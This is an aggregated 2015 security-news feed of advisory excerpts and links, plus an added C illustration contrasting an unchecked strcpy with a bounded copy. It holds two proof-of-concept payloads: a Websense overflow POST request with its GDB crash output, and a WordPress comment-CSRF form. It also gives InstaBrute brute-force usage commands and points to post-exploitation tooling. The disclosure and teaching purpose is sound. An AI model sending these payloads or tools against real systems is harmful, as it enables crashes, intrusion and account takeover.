Channel: BOT24
Viewing all 8064 articles

The iOS process explorer now provides full core dump of any PID - both ARMv7 and ARMv8

If the Windows process explorer can provide core dumps, why can't we? I decided to integrate some of my coreuption tools into Process Explorer, so it now provides a full dump of any PID you so choose - presently on iOS only, but for both 32-bit and 64-bit. Usage could not be simpler

more here...................http://newosxbook.com/forum/viewtopic.php?f=3&t=16587




avast! TaskEx RPC EoP (and potential RCE)

Here is a new bug, this time in English. Since most of the logic issues have been dealt with, this one will be a memory corruption, with exploit. Once again, it was patched about a year ago by the avast! team.

Summary
Bug type: stack overflow
Vector: LPC (or RPC if the ncacn_ip_tcp Chest endpoint is enabled)
Impact: EoP (or unauthenticated RCE)
Verified on: avast! Free ashTaskEx.dll v9.0.2018.391

Description
The ashTaskEx.dll implements an RPC interface that is bound to a local ncalrpc endpoint, this interface being 908d4c23-138f-4ac5-af4a-08584ae7c67b v1.0. Most of the functions offered by this interface do not enforce any specific checks and are accessible by unprivileged local users. Those functions are processed within the AvastSvc.exe binary, which runs as SYSTEM.

more here............................http://expertmiami.blogspot.com/2015/08/avast-taskex-rpc-eop-and-potential-rce.html



Android MediaServer Bug Traps Phones in Endless Reboots

We have discovered a new vulnerability that allows attackers to perform denial of service (DoS) attacks on Android’s mediaserver program. This causes a device’s system to reboot and drain all its battery life. In more a severe case, where a related malicious app is set to auto-start, the device can be trapped in an endless reboot and rendered unusable.

The vulnerability, CVE-2015-3823, affects Android versions 4.0.1 Jelly Bean to 5.1.1 Lollipop. Around 89% of the Android users (roughly 9 in 10 Android devices active as of June 2015) are affected. However, we have yet to discover active attacks in the wild that exploit this vulnerability.

This discovery comes hot on the heels of two other major vulnerabilities in Android’s media server component that surfaced last week. One can [...] while the other, Stagefright, can be used to install malware through a multimedia message.

more here............................http://blog.trendmicro.com/trendlabs-security-intelligence/android-mediaserver-bug-traps-phones-in-endless-reboots/



Kaspersky DDoS Intelligence Report Q2 2015

Of all Q2 2015 events in the world of DDoS attacks and tools with which to launch them, we picked out those which, in our opinion, best illustrate the main trends with which these threats evolve. Cybercriminals do the following:

Invent and use new techniques aimed at launching more powerful attacks without increasing botnet sizes;
Create botnets of devices connected to the Internet, and use them to carry out DDoS attacks;
Develop DDoS modules for malware toolkits with which to carry out targeted attacks.

more here....................https://securelist.com/analysis/quarterly-malware-reports/71663/kaspersky-ddos-intelligence-report-q2-2015/



CVE-2015-3290: Linux privilege escalation due to nested NMIs interrupting espfix64

On 07/22/2015 11:12 AM, Andy Lutomirski wrote:
> +++++ CVE-2015-3290 +++++
>
> High impact NMI bug on x86_64 systems 3.13 and newer, embargoed.  Also fixed by:
>
> https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=9b6e6a8334d56354853f9c255d1395c2ba570e0a
>
> The other fix (synchronous modify_ldt) does *not* fix CVE-2015-3290.
>
> You can mitigate CVE-2015-3290 by blocking modify_ldt or
> perf_event_open using seccomp.  A fully-functional, portable, reliable
> exploit is privately available and will be published in a week or two.
> *Patch your systems*

And here's a real advisory:

If an NMI returns via espfix64 and is interrupted during espfix64 setup
by another NMI, the return state is corrupt.  This is exploitable for
reliable privilege escalation on any Linux x86_64 system in which
untrusted code can arrange for espfix64 to be invoked and for NMIs to be
nested.

read on here............................http://www.openwall.com/lists/oss-security/2015/08/04/8






SEC Consult SA-20150805-0 :: Websense Content Gateway Stack Buffer Overflow in handle_debug_network

SEC Consult Vulnerability Lab Security Advisory < 20150805-0 >
=======================================================================
              title: Stack buffer overflow in handle_debug_network
            product: Websense Triton Content Manager
 vulnerable version: 8.0.0 build 1165
      fixed version: V8.0.0 HF02
         CVE number: CVE-2015-5718
             impact: high
           homepage: www.websense.com
              found: 2015-04-13
                 by: C. Schwarz (Office Bangkok)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Berlin - Frankfurt/Main - Montreal - Singapore
                     Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
Websense Content Gateway (Content Gateway) is a Linux-based, high-performance Web
proxy and cache that provides real-time content scanning and Web site classification
to protect network computers from malicious Web content while controlling employee
access to dynamic, user-generated Web 2.0 content. Web content has evolved from a
static information source to a sophisticated platform for 2-way communications,
which can be a valuable productivity tool when adequately secured.

URL: http://www.websense.com/content/support/library/deployctr/v76/dic_wcg.aspx


Business recommendation:
------------------------
Attackers are able to completely compromise the Websense Content Manager with
combined targeted attack vectors.

The scope of the test, where the vulnerabilities have been identified, was a
very short crash-test of the application. It is assumed that further
vulnerabilities exist within this product.


Vulnerability overview/description:
-----------------------------------
A stack-based buffer overflow was identified in the Websense Content Manager
administrative interface: "handle_debug_network" calls "strcpy" into the
512-byte stack buffer "dest" without checking the length of the request
parameter, so an oversized value writes past the end of the buffer. The
vulnerability can be used in combination with a CSRF attack to crash the
system or execute arbitrary code.
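The following is an added illustration of the bug class described above, not code from the advisory or from Websense. It puts the unchecked strcpy pattern next to a bounded copy that rejects oversized input, and feeds both a form body shaped like the advisory's request. The field name "cmd_param" and the 512-byte buffer size come from the advisory; the helper names and the exact body layout are assumptions.

```c
/* Added example (not Websense code): vulnerable copy vs. bounded copy of a
 * form field into a fixed 512-byte stack buffer. Helper names are hypothetical. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEST_SIZE 512   /* size of "dest" in handle_debug_network, per the advisory */

/* Find `key=` at the start of a field in a form-encoded body and return a
 * malloc'd, NUL-terminated copy of its value (up to '&'), or NULL if absent.
 * Percent-decoding is omitted: the advisory's payload is plain 'A' bytes. */
static char *form_field_dup(const char *body, const char *key)
{
    size_t klen = strlen(key);
    const char *p = body;
    while (p && *p) {
        if (strncmp(p, key, klen) == 0 && p[klen] == '=') {
            const char *start = p + klen + 1;
            const char *end = strchr(start, '&');
            size_t n = end ? (size_t)(end - start) : strlen(start);
            char *out = malloc(n + 1);
            if (!out) return NULL;
            memcpy(out, start, n);
            out[n] = '\0';
            return out;
        }
        p = strchr(p, '&');
        if (p) p++;
    }
    return NULL;
}

/* The vulnerable pattern: the value length is never compared with the 512-byte
 * stack buffer, so a 2048-byte value overwrites saved registers and the return
 * address (the 0x4141... frames in the backtrace). Shown for contrast; not called. */
int copy_cmd_param_unsafe(const char *cmd_param)
{
    char dest[DEST_SIZE];
    strcpy(dest, cmd_param);            /* no bounds check: stack overflow */
    return (int)strlen(dest);
}

/* Bounded version: refuse any value that does not fit together with its NUL
 * rather than silently truncating it. Returns the copied length or -1. */
int copy_cmd_param_safe(const char *cmd_param, char *dest, size_t dest_size)
{
    const char *nul = memchr(cmd_param, '\0', dest_size);
    if (!nul) return -1;                /* no terminator within dest_size: too long */
    size_t n = (size_t)(nul - cmd_param);
    memcpy(dest, cmd_param, n + 1);
    return (int)n;
}

/* Hardened handler for one request body: 0 on success, -1 when cmd_param is
 * missing or too long (the advisory's crash case becomes a rejected request). */
int handle_debug_network_hardened(const char *body)
{
    char dest[DEST_SIZE];
    char *param = form_field_dup(body, "cmd_param");
    if (!param) return -1;
    int rc = copy_cmd_param_safe(param, dest, sizeof dest);
    free(param);
    return rc < 0 ? -1 : 0;
}

/* Constructed request body in the shape of the advisory's POST, with n 'A's. */
char *build_request_body(size_t n)
{
    const char *prefix = "record_version=10479%3A70&cmd_name=1&cmd_param=";
    const char *suffix = "&cmd_status=0&cate=ping";
    char *body = malloc(strlen(prefix) + n + strlen(suffix) + 1);
    if (!body) return NULL;
    strcpy(body, prefix);
    memset(body + strlen(prefix), 'A', n);
    strcpy(body + strlen(prefix) + n, suffix);
    return body;
}

int main(void)
{
    char *big = build_request_body(2048), *small = build_request_body(16);
    printf("2048 A's -> %d\n", handle_debug_network_hardened(big));   /* -1 */
    printf("16 A's   -> %d\n", handle_debug_network_hardened(small)); /* 0 */
    free(big); free(small);
    return 0;
}
```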


Proof of concept:
-----------------
A single HTTP request is sufficient to crash the content_manager binary:

POST /submit_net_debug.cgi?mode=0&menu=0&item=4&tab=1 HTTP/1.1
Host: <content gateway>:8081
[...]
Content-Length: 869

record_version=10479%3A70&submit_from_page=%2Fmonitor%2Fm_net_debug.ink&cmd_name=1&cmd_param=[Ax2048]&cmd_status=0&troute_install=0&tdump_install=0&cmd_action=1&cate=ping&cate=asd&apply=apply

Below is the GDB output for the crashed process. Most of the CPU registers,
including the saved frame pointers of several previous stack frames, have been
overwritten with the value 'A' (0x41).

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0x7f122b073700 (LWP 50174)]
0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized out>,
arg=<value optimized out>) at
/home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
997     /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc: No such
file or directory.
        in /home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc
(gdb) i r
rax            0x0      0
rbx            0x4141414141414141       4702111234474983745
rcx            0x125c0  75200
rdx            0xda3f   55871
rsi            0x3541360        55841632
rdi            0x1      1
rbp            0x4141414141414141       0x4141414141414141
rsp            0x7f122b070618   0x7f122b070618
r8             0x4141414141414141       4702111234474983745
r9             0x4141414141414141       4702111234474983745
r10            0x4141414141414141       4702111234474983745
r11            0x3f2c35a350     271324652368
r12            0x4141414141414141       4702111234474983745
r13            0x4141414141414141       4702111234474983745
r14            0x4141414141414141       4702111234474983745
r15            0x4141414141414141       4702111234474983745
rip            0x6becb1 0x6becb1 <handle_debug_network(WebHttpContext*, char const*, char*)+561>
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) bt
#0  0x00000000006becb1 in handle_debug_network (whc=<value optimized out>, tag=<value optimized
out>, arg=<value optimized out>) at
/home/cmbuild/Compass-Proxy/src/dev/WCG/traffic/proxy/mgmt2/web2/WebHttpRender.cc:997
#1  0x4141414141414141 in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x4141414141414141 in ?? ()
#4  0x4141414141414141 in ?? ()
#5  0x4141414141414141 in ?? ()
#6  0x4141414141414141 in ?? ()
#7  0x4141414141414141 in ?? ()
#8  0x4141414141414141 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
#15 0x4141414141414141 in ?? ()
#16 0x4141414141414141 in ?? ()
#17 0x0000000000000000 in ?? ()
(gdb)


Vulnerable / tested versions:
-----------------------------
Websense Triton Content Manager 8.0.0 build 1165


Vendor contact timeline:
------------------------
2015-05-18: Contacting vendor
2015-06-02: established secure communication channel
2015-06-03: sending advisory draft
2015-06-24: requesting update from vendor
2015-07-16: requesting update from vendor
2015-07-20: requesting update from vendor
2015-07-24: Websense states that hotfix V8.0.0 HF02 was released on 2015-06-10
2015-08-05: Public advisory release


Solution:
---------
The vulnerability has been fixed in hotfix V8.0.0 HF02.
http://www.websense.com/support/article/kbarticle/v8-0-0-About-Hotfix-02-for-Websense-Content-Gateway


Workaround:
-----------
No workaround available.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Berlin - Frankfurt/Main - Montreal - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF Christoph Schwarz / @2015



Exploring Qualcomm's TrustZone implementation

In this blog post, we'll be exploring Qualcomm's TrustZone implementation, as present on Snapdragon SoCs. If you haven't already, you might want to read the previous blog post, in which I go into some detail about TrustZone in general.

Where do we start?

First of all, since Qualcomm's TrustZone implementation is closed-source, and as far as I could tell, there are no public documents detailing its architecture or design, we will probably need to reverse-engineer the binary containing the TrustZone code, and analyse it.


more here.................................http://bits-please.blogspot.com/2015/08/exploring-qualcomms-trustzone.html


Bypassing Malware Scanning in Sophos UTM Web Protection - Again

This article describes several ways of employing uncommon or invalid HTTP responses to transport malware from server to client without being detected by Sophos UTM Web Protection. All of these bypasses got reported to Sophos and most of them are fixed by now.

more here.......................http://noxxi.de/research/sophos-utm-webprotection-bypass2.html



Who’s Behind Your Proxy? Uncovering Bunitu’s Secrets

In our previous analysis we showed how the Bunitu Trojan was distributed via the Neutrino exploit kit in various malvertising campaigns. After spending more time analyzing the proxy, we realized that the requests we were receiving were not related to ad-fraud activity (as we initially suspected) but instead appeared to be for some sort of VPN service.

We believe that the operators of the Bunitu botnet are selling access to infected proxy bots as a way to monetize their botnet. People using certain VPN service providers to protect their privacy are completely unaware that the backend uses a criminal infrastructure of infected computers worldwide.

more here.........................https://blog.malwarebytes.org/botnets/2015/08/whos-behind-your-proxy-uncovering-bunitus-secrets/



PCRE Library Heap Overflow Vulnerability

PCRE is a regular expression C library inspired by the regular expression capabilities in the Perl programming language. The PCRE library is incorporated into a number of prominent programs, such as Adobe Flash, Apache, Nginx, PHP.

The PCRE library is prone to a heap overflow. During compilation of a malformed regular expression, more data is written to the malloc'd block than the size computed by compile_regex. Exploits using advanced heap feng shui techniques may allow an attacker to execute arbitrary code in the context of the user running the affected application.

more here.........................https://bugs.exim.org/show_bug.cgi?id=1667




Comment form CSRF in WordPress 4.2.2 allows admin impersonation via comments

Details
================
Software: WordPress
Version: 3.8.1,3.8.2,4.2.2
Homepage: http://wordpress.org/
Advisory report: https://security.dxw.com/advisories/comment-form-csrf-allows-admin-impersonation-via-comments-in-wordpress-4-2-2/
CVE: Awaiting assignment
CVSS: 4.3 (Medium; AV:N/AC:M/Au:N/C:N/I:P/A:N)

Description
================
Comment form CSRF in WordPress 4.2.2 allows admin impersonation via comments

Vulnerability
================
When posting comments, WordPress does not require a nonce value (unless posting unfiltered HTML). This means that an attacker can force a logged-in user to post arbitrary comments.
For this to happen, the logged-in user would have to be tricked into clicking on a link controlled by the attacker. It is easy to make these links very convincing.
The line which verifies the nonce when using unfiltered HTML is line 154 of wp-comments-post.php.
EDIT: this issue has been known about since 2009, but it appears that no fix is planned  https://core.trac.wordpress.org/ticket/10931

Proof of concept
================
Log in, visit a URL containing the following (replacing localhost as appropriate, replacing 1 with the ID of a post), click submit:
<form method="POST" action="http://localhost/wp-comments-post.php">
  <input type="text" name="comment_post_ID" value="1">
  <input type="text" name="comment" value="UH OH">
  <input type="submit">
</form>

(In a real attack the form can be made to auto-submit using JavaScript)

Mitigations
================
Disable comments until a new version is released that fixes this bug

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@dxw.com to acknowledge this report if you received it via a third party (for example, plugins@wordpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report within 14 days.

Timeline
================

2009-10-19: Ticket raised by mtdewvirus
2014-03-20: Discovered independently by dxw
2015-07-14: Reported to security@wordpress.org
2015-07-14: Requested CVE
2015-07-17: Response from nikolay@automattic.com
2015-08-05: Published



Discovered by dxw:
================
Tom Adams
Please visit security.dxw.com for more information.



PowerShell Empire

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework.

more here.....................https://github.com/PowerShellEmpire/Empire











InstaBrute

Description

Instagram bruteforce exploit module

Usage

Usage: instaBrute -h

Dependencies

Mechanize
CookieLib
Simplejson
OptParse

Example

    python instaBrute.py -f usernames.txt -d dictionary.txt
    python instaBrute.py -u facebook -d dictionary.txt

Features

Check username existence
Check password for a given username
Brute forcer

more here......................https://github.com/chinoogawa/instaBrute


SuiteCRM Post Auth Shell Upload Race Condition Exploit (Video Demo)

In version 7.2.2-max of SuiteCRM the developers patched a post-authentication shell upload vulnerability disclosed by Darren Martyn of Xiphos Research Ltd. However, despite his warnings, their patch did nothing to fix the underlying vulnerability and simply made it exploitable again via a race condition.

This video demonstrates reliable exploitation of said race condition to spawn a reverse shell on the affected host. Doubtlessly, their patch for this will introduce more vulnerabilities.

Video here............................https://www.youtube.com/watch?v=eHVIg5eoYNc



PeStudio Advisory

PeStudio is a utility used by a number of security professionals that carries out static analysis of 32-bit and 64-bit Windows executable files.

As described on winitor.com "malicious executable attempts to hide its malicious intents and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of pestudio is to detect these anomalies, provide indicators and score the executable being analyzed."

Unfortunately, Marc Ochsenmeier found that there appear to be several (Russian) instances of malware using pestudioprompt.exe as camouflage. Here is a file recently uploaded to VirusTotal as an example: https://www.virustotal.com/en/file/00db74346f844eadb5d88b4c84b8110e5908749140728e64355ab561d40a8536/analysis/. It is therefore recommended that if you are going to download this tool, you obtain it solely from http://www.winitor.com.




Threat Group-3390 Targets Organizations for Cyberespionage

Dell SecureWorks Counter Threat Unit(TM) (CTU) researchers investigated activities associated with Threat Group-3390[1] (TG-3390). Analysis of TG-3390's operations, targeting, and tools led CTU researchers to assess with moderate confidence the group is located in the People's Republic of China. The threat actors target a wide range of organizations: CTU researchers have observed TG-3390 actors obtaining confidential data on defense manufacturing projects, but also targeting other industry verticals and attacking organizations involved in international relations. The group extensively uses long-running strategic web compromises[2] (SWCs), and relies on whitelists to deliver payloads to select victims. In comparison to other threat groups, TG-3390 is notable for its tendency to compromise Microsoft Exchange servers using a custom backdoor and credential logger.

more here.................................http://www.secureworks.com/cyber-threat-intelligence/threats/threat-group-3390-targets-organizations-for-cyberespionage/



White Paper: Server-Side Template Injection

Template engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, a frequently critical vulnerability that is extremely easy to mistake for Cross-Site Scripting (XSS), or miss entirely. Unlike XSS, Template Injection can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point.

Template Injection can arise both through developer error, and through the intentional exposure of templates in an attempt to offer rich functionality, as commonly done by wikis, blogs, marketing applications and content management systems. Intentional template injection is such a common use-case that many template engines offer a 'sandboxed' mode for this express purpose. This paper defines a methodology for detecting and exploiting template injection, and shows it being applied to craft RCE zerodays for two widely deployed enterprise web applications. Generic exploits are demonstrated for five of the most popular template engines, including escapes from sandboxes whose entire purpose is to handle user-supplied templates in a safe way.

more here..................https://portswigger.net/knowledgebase/papers/ServerSideTemplateInjection.pdf



PSRecon Live Incident Response and Forensic Data Acquisition PowerShell script

PSRecon gathers data from a remote Windows host using PowerShell (v2 or later), organizes the data into folders, hashes all extracted data, hashes PowerShell and various system properties, and sends the data off to the security team. The data can be pushed to a share, sent over email, or retained locally.


One nice part about the report is that everything is self-contained, making it easy to share as there is no reliance on a centralized server. Even the images are encoded directly into the report's HTML.


This script also includes endpoint lockdown functionality. This can be useful when working through a malware outbreak incident, especially when there is a risk that the malware will spread to a share or other critical systems within the enterprise. Sometimes the quickest and most effective way to stop the spread of malware is to simply knock the host offline until IT/Security can respond, after the forensic data has been extracted. As an alternative to quarantining the host, PSRecon can also disable an Active Directory account.

Ideally, this script should be integrated with the organization's Active Defense frameworks to automate rapid forensic data acquisition and lock down the endpoint.

more here........................https://github.com/gfoss/PSRecon/

Nuclear EK traffic patterns in August 2015

About two weeks ago, Nuclear exploit kit (EK) changed its URL patterns.  Now it looks a bit like Angler EK.  Kafeine originally announced the change on 2015-07-21 [1], and we collected examples the next day.

Here's how Nuclear EK looked on 2015-07-20 [2]:


Here's how Nuclear EK appeared two days later on 2015-07-22 after the change [1]:


Now that we're into August 2015, URL patterns for Nuclear EK have altered again.  These changes are similar to what we've seen with Angler EK since June 2015 [3].  They're not the same URL patterns as Angler, but the changes are similar.

In today's diary, we examine Nuclear EK traffic as of Tuesday, 2015-08-04.  In this example, the EK delivered Troldesh ransomware, which is similar to a previous infection I published earlier this year in April 2015 [4].

First, let's see how the 2015-08-04 traffic from a compromised website led to Nuclear EK here.............https://isc.sans.edu/diary/Nuclear+EK+traffic+patterns+in+August+2015/20001

White Paper: Abusing Windows Management Instrumentation (WMI) to Build a Persistent, Asynchronous, and Fileless Backdoor (Inclusive BlackHat 2015 slide presentations and more 1st Day)

As technology is introduced and subsequently deprecated over time in the Windows operating system, one powerful technology that has remained consistent since Windows NT 4.0[1] and Windows 95[2] is Windows Management Instrumentation (WMI). Present on all Windows operating systems, WMI is comprised of a powerful set of tools used to manage Windows systems both locally and remotely.

While it has been well known and utilized heavily by system administrators since its inception, WMI was likely introduced to the mainstream security community when it was discovered that it was used maliciously as one component in the suite of exploits and implants used by Stuxnet[3]. Since then, WMI has been gaining popularity amongst attackers for its ability to perform system reconnaissance, AV and VM detection, code execution, lateral movement, persistence, and data theft.

As attackers increasingly utilize WMI, it is important for defenders, incident responders, and forensic analysts to have knowledge of WMI and to know how they can wield it to their advantage. This whitepaper will introduce the reader to WMI, actual and proof-of-concept attacks using WMI, how WMI can be used as a rudimentary intrusion detection system (IDS), and how to perform forensics on the WMI repository file format.


more here......................https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf


and slides here..........................https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-Persistent%20Asynchronous-And-Fileless-Backdoor.pdf


BlackHat 2015 presentation slides/white papers - Day 1 here.............https://www.blackhat.com/us-15/briefings.html



